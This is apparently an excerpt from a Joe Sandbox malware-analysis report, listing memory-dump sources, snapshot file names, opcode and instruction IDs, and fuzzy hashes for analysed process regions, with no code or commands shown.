                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9bad0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3a8df31e2a587784ca296952ede882b493ae621526d623d59da1f9bba7ec9895
                                                                                                                    • Instruction ID: 434f0cfd24a501d58becc9acc391eb433a67807af630b6e3117dfdb6115aa9c5
                                                                                                                    • Opcode Fuzzy Hash: 3a8df31e2a587784ca296952ede882b493ae621526d623d59da1f9bba7ec9895
                                                                                                                    • Instruction Fuzzy Hash: 2CC2C731B1D91E4FEBA8EB5884A16B87392FFA8350F1542B9D05DC72D6CE78BD418780
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9bac0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5Y_H
                                                                                                                    • API String ID: 0-3237497481
                                                                                                                    • Opcode ID: 9fdee1a0af2d003c75313fe89c82eff9e3d93772798941db1daca24a59609427
                                                                                                                    • Instruction ID: dfc5617d43c877c72ae4f627d7ede2b45422ad2c4fe99f0ee4b2abf09a329813
                                                                                                                    • Opcode Fuzzy Hash: 9fdee1a0af2d003c75313fe89c82eff9e3d93772798941db1daca24a59609427
                                                                                                                    • Instruction Fuzzy Hash: 6F91F471A19A8D8FE799EB6888657B87FE1FF5A314F0102BED059D72E6CBB81410C740
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9bad0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9114a8e770a67acedd54fe8173afa2aae3ee6ae89c729e7cde08fa2f5b3ee80d
                                                                                                                    • Instruction ID: 3a0656acdbaec9009c5eb6c62baeaad8dac975f16df13307b98602dfdd10c33b
                                                                                                                    • Opcode Fuzzy Hash: 9114a8e770a67acedd54fe8173afa2aae3ee6ae89c729e7cde08fa2f5b3ee80d
                                                                                                                    • Instruction Fuzzy Hash: AD62B731B1DA1E4FEBA8EB5884A17B47392FFA8350F1542B9D01DC72D6DE78AD418B40
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9baf0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a17ee8347e90f4854b59d3211e7f89cb5afcd3d33d968addb1be9b224deeebb4
                                                                                                                    • Instruction ID: a24b18909edbebd15dad211d0d8075b37051a24d77c19ab56562d0ca1ad67885
                                                                                                                    • Opcode Fuzzy Hash: a17ee8347e90f4854b59d3211e7f89cb5afcd3d33d968addb1be9b224deeebb4
                                                                                                                    • Instruction Fuzzy Hash: 80C19B20B1F79E0AE33D4A6848624F17B91EF92605B1A83BDC8DBC7097DD68760783C5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9bac0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c9$!k9$"s9
                                                                                                                    • API String ID: 0-3426396564
                                                                                                                    • Opcode ID: 1332c719c76affe887704e93c0b8f7a3fcdb380ca1128a8470250fa08ca4048e
                                                                                                                    • Instruction ID: 9ec78bfb1d555c3c4c2e629127fbce79dfef656486633dc04b785726e2ef7695
                                                                                                                    • Opcode Fuzzy Hash: 1332c719c76affe887704e93c0b8f7a3fcdb380ca1128a8470250fa08ca4048e
                                                                                                                    • Instruction Fuzzy Hash: 6F01D12772A95E8BD641AB7EF8500F8BB40EAD7136B9603F7D044C71A2E551285AC3D0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9baf0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: c7c5cf8004e59fb520d06a6347ab8f550ef73a922c6764a689015c0a4f7a5274
                                                                                                                    • Instruction ID: 7c7e3fe5fe840c6beee7f75f3c708aad4877dd5d01b886b77be12c4fbca549c3
                                                                                                                    • Opcode Fuzzy Hash: c7c5cf8004e59fb520d06a6347ab8f550ef73a922c6764a689015c0a4f7a5274
                                                                                                                    • Instruction Fuzzy Hash: FCF0C271A0F3C54FCB26A7794829455BF60EE2721178A45FEC086CF1B3E96D888AC701
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Instruction ID: 59f8fd2efbc150a5d44f100d1a1a2bc09edf15bcecf65a165e36e422e3060799
                                                                                                                    • Opcode Fuzzy Hash: c78c220df84002c2ae55ea5273d0ad61adc386d5d14dab9d13cc75d3d01402b9
                                                                                                                    • Instruction Fuzzy Hash: A5F03131A4D50E4BEB74FB94D4546F833A1FB94310F26417DD40ED32B6DDB86A818A08
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9bac0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: aaff0950125fc84efde3dfe9d2ebaf0dff806cd582eb8a6756b71a258869588e
                                                                                                                    • Instruction ID: b98fccd0d8eebff63d902f2398e7fa61d992de4464224f0fcc083a80d85286cb
                                                                                                                    • Opcode Fuzzy Hash: aaff0950125fc84efde3dfe9d2ebaf0dff806cd582eb8a6756b71a258869588e
                                                                                                                    • Instruction Fuzzy Hash: 46F0AB3120E64CCFDB41EB3CDCA50E43B50EF43208B4B12FBC088C7562C210184AC700
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9bac0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9df94f2208747136d1674d705e150cf51176d51cdf3f75b1aae9bd6180041409
                                                                                                                    • Instruction ID: 4430b26e91a70c5c8131641020c4af48e9d1b69953c89250b1d673a4ef5f73f6
                                                                                                                    • Opcode Fuzzy Hash: 9df94f2208747136d1674d705e150cf51176d51cdf3f75b1aae9bd6180041409
                                                                                                                    • Instruction Fuzzy Hash: C5018F34A0E3898FE722EBA488542ADBFB0AF02314F1541E7D484DB1A7D9785748C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9bac0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e7071e9768f307cac85c4e06492b7ac69906dbb1210c331efbe3734c100713da
                                                                                                                    • Instruction ID: d26696a46681e285d400bfd58b341776aed3c857c9dee7354f98390e533c6bd1
                                                                                                                    • Opcode Fuzzy Hash: e7071e9768f307cac85c4e06492b7ac69906dbb1210c331efbe3734c100713da
                                                                                                                    • Instruction Fuzzy Hash: ACE01A06F5FA2F02E57537ED68660FC72104FC4A28FA60172E41C860E6ACCE2685026A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9baf0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 91584177234e4e94a14b134fd712f47b102e104ad9da032089c314db0102a9c1
                                                                                                                    • Instruction ID: 12af7d8e7e00b200c37f395b303df6c86e9143e3246ac83167012c0307e71d6e
                                                                                                                    • Opcode Fuzzy Hash: 91584177234e4e94a14b134fd712f47b102e104ad9da032089c314db0102a9c1
                                                                                                                    • Instruction Fuzzy Hash: 18E0927060A3844FC71AAA3484A84547F60EF6720134A42EEC045CF2A7EA2DC889C701
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9bad0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4c0cc8ab5b5e5dd096c041dbf0a0759328a4319bdba0fc76882597c3a76357aa
                                                                                                                    • Instruction ID: a868bf88c2362124a65fcfdb63881f56884da7c0519239845c2e0321c549a1fb
                                                                                                                    • Opcode Fuzzy Hash: 4c0cc8ab5b5e5dd096c041dbf0a0759328a4319bdba0fc76882597c3a76357aa
                                                                                                                    • Instruction Fuzzy Hash: FCF05435A0450E8BEB14EB80C8646BD37B1FF90354F014239D425EA2E9DE7469018740
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9baf0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f4ee915f9f62b4f796d342044e96dab82c53d39d201c89cac9edd989eb0d78e4
                                                                                                                    • Instruction ID: 4cf3e01dacb002e208312810da5fecac572d2367263a3dfe30444c495f04800a
                                                                                                                    • Opcode Fuzzy Hash: f4ee915f9f62b4f796d342044e96dab82c53d39d201c89cac9edd989eb0d78e4
                                                                                                                    • Instruction Fuzzy Hash: 86E0ED6164F3C44FCB16AA788868455BF60EE6721174A51EEC146CF2A7EA2D8889C701
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9baf0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 78c483ff6feebfb0c299e5163bae7025a2f7703b781fe34f41d75dc30e43fc08
                                                                                                                    • Instruction ID: ec2f29d60ae6ca7a1cfaa6f3c78dd635607135fe21752415f486db6f69fd6877
                                                                                                                    • Opcode Fuzzy Hash: 78c483ff6feebfb0c299e5163bae7025a2f7703b781fe34f41d75dc30e43fc08
                                                                                                                    • Instruction Fuzzy Hash: A5E04F2165AB844FC74A96388C659503FB0EA6B21178B01D7D045CB1B3E61DCC49C711
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9bad0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 28505fb1def6c7f49abba11a7e7603b03e611b0f365886fbc13876b7fc566b7c
                                                                                                                    • Instruction ID: 05125ca6ac6427422ac393665f971a8b53d443bb6627ba87f2bc28f5714ef969
                                                                                                                    • Opcode Fuzzy Hash: 28505fb1def6c7f49abba11a7e7603b03e611b0f365886fbc13876b7fc566b7c
                                                                                                                    • Instruction Fuzzy Hash: 93D0A730B6190D4B8B0CB63D8858430F3D1F7AA2067D4527DD40BC3291ED65ECC6CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9bad0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 407f99ad7ac023a7d5090b7cdb25a3e1ba4ec43be87d1135fd09ee978b76a266
                                                                                                                    • Instruction ID: a7433d85eb501fa178030eda640bf37964b1741df7a66fe575de72c17790bcde
                                                                                                                    • Opcode Fuzzy Hash: 407f99ad7ac023a7d5090b7cdb25a3e1ba4ec43be87d1135fd09ee978b76a266
                                                                                                                    • Instruction Fuzzy Hash: 33E04F32B0EC4A87F772A75888605BE3253EFD0361B164735C01DC31E5DEACE7068680
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9baf0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bb09a0ce40360abf09e060e5c2c93005aaad2d68c0d6ad047c0d0a67358d0a70
                                                                                                                    • Instruction ID: 556358ff1d978c25e202b9c76064b625ce424a711a9668d4d6528043424ea0b5
                                                                                                                    • Opcode Fuzzy Hash: bb09a0ce40360abf09e060e5c2c93005aaad2d68c0d6ad047c0d0a67358d0a70
                                                                                                                    • Instruction Fuzzy Hash: 55E01A6154E3C44FCB06EB7488698447FA0AE6B21078A40EEC145CF1B3E62D8949C701
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9baf0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                    • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9baf0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                    • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9baf0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 58dc80f82fff62020c50daaffe5ca4d98f860a7b035311bb60c8cf404992393c
                                                                                                                    • Instruction ID: a25623b79ca096f107e0ad54c48b633179c52f7cb28cd8cf3f5b0b77629b2038
                                                                                                                    • Opcode Fuzzy Hash: 58dc80f82fff62020c50daaffe5ca4d98f860a7b035311bb60c8cf404992393c
                                                                                                                    • Instruction Fuzzy Hash: 17E0462294F7C44FC70B9B3588A88943F70AE2721078A40EBC185CF2B3EA298949C702
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9baf0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    • Instruction Fuzzy Hash: 0E11E031A0E68C8FE722DBA888612DC7FB0EF82311F4646B7C084CB1A2D5741609C781
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bb3c139564bbb21169037030bddfe281cfe839f217f0397df28813537585095f
                                                                                                                    • Instruction ID: cd5e65c90256c80b854d8e389a26fb5238debba71924ec35a68f740cdd1a0e38
                                                                                                                    • Opcode Fuzzy Hash: bb3c139564bbb21169037030bddfe281cfe839f217f0397df28813537585095f
                                                                                                                    • Instruction Fuzzy Hash: 9901C431A0E78C8FE722DB68C8652DD7FB0EF82315F5646E7C084DB1A2D5745648C781
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 66d76f297a0720b72ef67566d1a09a95c39f8faa7cfae725924a7045a15a4cb7
                                                                                                                    • Instruction ID: b58b725e91e148f5b2a7fdaaaa801576f1e8ff5bce033b2c3176252ab488234a
                                                                                                                    • Opcode Fuzzy Hash: 66d76f297a0720b72ef67566d1a09a95c39f8faa7cfae725924a7045a15a4cb7
                                                                                                                    • Instruction Fuzzy Hash: D4014431A599188FCB59DB48C8A49E9B3F1FB98310F15426DD04ED32A1CB34AA41CB81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c78c220df84002c2ae55ea5273d0ad61adc386d5d14dab9d13cc75d3d01402b9
                                                                                                                    • Instruction ID: 33b7d2c5dd46e8a3073e0c5bb6d4a46d134e9b3685107eff6423653fe3cdf18b
                                                                                                                    • Opcode Fuzzy Hash: c78c220df84002c2ae55ea5273d0ad61adc386d5d14dab9d13cc75d3d01402b9
                                                                                                                    • Instruction Fuzzy Hash: 68F03131A4D50E4AEB74EB94D4646EC33A1FBD4310F22427DD40ED32B6DDB86A818A04
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 158fe690741e9b262f9e87304593b1abe3f765ad36320972d46563ec4e484d9e
                                                                                                                    • Instruction ID: 9d6cb40344f499d0602e600beb3648148a500c0a09d485a119545bd7136689ab
                                                                                                                    • Opcode Fuzzy Hash: 158fe690741e9b262f9e87304593b1abe3f765ad36320972d46563ec4e484d9e
                                                                                                                    • Instruction Fuzzy Hash: E7F0AB31209A498FCB42EB3CDCA50E43B10EF4320879B16FBC088C7072C210055AC700
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d60aeb95977bd63745a81884a2dd8b03dc2d17adcaae3576decc2132878572e7
                                                                                                                    • Instruction ID: 3538dba391c23bccf7ac028c69a20ea851fa4d1ed598b324f0bead5332598722
                                                                                                                    • Opcode Fuzzy Hash: d60aeb95977bd63745a81884a2dd8b03dc2d17adcaae3576decc2132878572e7
                                                                                                                    • Instruction Fuzzy Hash: B901A230A0E3CC8FE722DBA488642DDBFF0AF42314F5542E7C484CB1A2DA785648C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 139a9c564406fe8d95a81ce687f8d159631e2ba815473299c77cc1a7da7fe0d9
                                                                                                                    • Instruction ID: 1848593244319786c7484619379577300bc5f2530f9a3bc11c604b3306c71396
                                                                                                                    • Opcode Fuzzy Hash: 139a9c564406fe8d95a81ce687f8d159631e2ba815473299c77cc1a7da7fe0d9
                                                                                                                    • Instruction Fuzzy Hash: D2E01A0AF5F51F02E57533E968760EC76108FC4A24FD60372E40C880E6ACCE2685826A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ce0594d74662a3e7710401447a1c56f810fad8591153e79ac0b3614562c5ba31
                                                                                                                    • Instruction ID: 2120eca5c3a28b7676e168761084c0c98b940c8628ff2c181b9ccc8dad37705e
                                                                                                                    • Opcode Fuzzy Hash: ce0594d74662a3e7710401447a1c56f810fad8591153e79ac0b3614562c5ba31
                                                                                                                    • Instruction Fuzzy Hash: F7E06D70F0B50E4EF370A7A0C425BA9A2A0AF90300F0546B9D50E961A2CDF869808B89
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 329141e2bf43298c0bfac1ccf9e39dadef2731d9ca7cf5e060932369513e2a5c
                                                                                                                    • Instruction ID: f0cac1715a388248019fcdc27b225aac9cd10a195bfc25390174b30b057bf75e
                                                                                                                    • Opcode Fuzzy Hash: 329141e2bf43298c0bfac1ccf9e39dadef2731d9ca7cf5e060932369513e2a5c
                                                                                                                    • Instruction Fuzzy Hash: E1D0A705F5D45A57E37AE36408218BE08870FD5328F090334F01EC92E9EE9C1A0152C3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b764fbe3770bf2e3e072d769b89b0d506276cd4e1d123e9c4e624545fc2e8e70
                                                                                                                    • Instruction ID: 772dbf9ebf4f934dde63cfa1c47e19edf8b5ba30cc8e6c4321266584497f1eed
                                                                                                                    • Opcode Fuzzy Hash: b764fbe3770bf2e3e072d769b89b0d506276cd4e1d123e9c4e624545fc2e8e70
                                                                                                                    • Instruction Fuzzy Hash: DAC08C3052180C8FC904EB3CC88490032A0FB0D214BC20190E00DC7170E29A9C80C700
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction ID: b973e47480f416ec2620f1f3931be3ed377a92be5e1d2adbe71f1e988c853338
                                                                                                                    • Opcode Fuzzy Hash: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction Fuzzy Hash: BBC08C3051180C8FC908EB28C88490833A0FB09300BC20090E008C7170D259DDC0C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
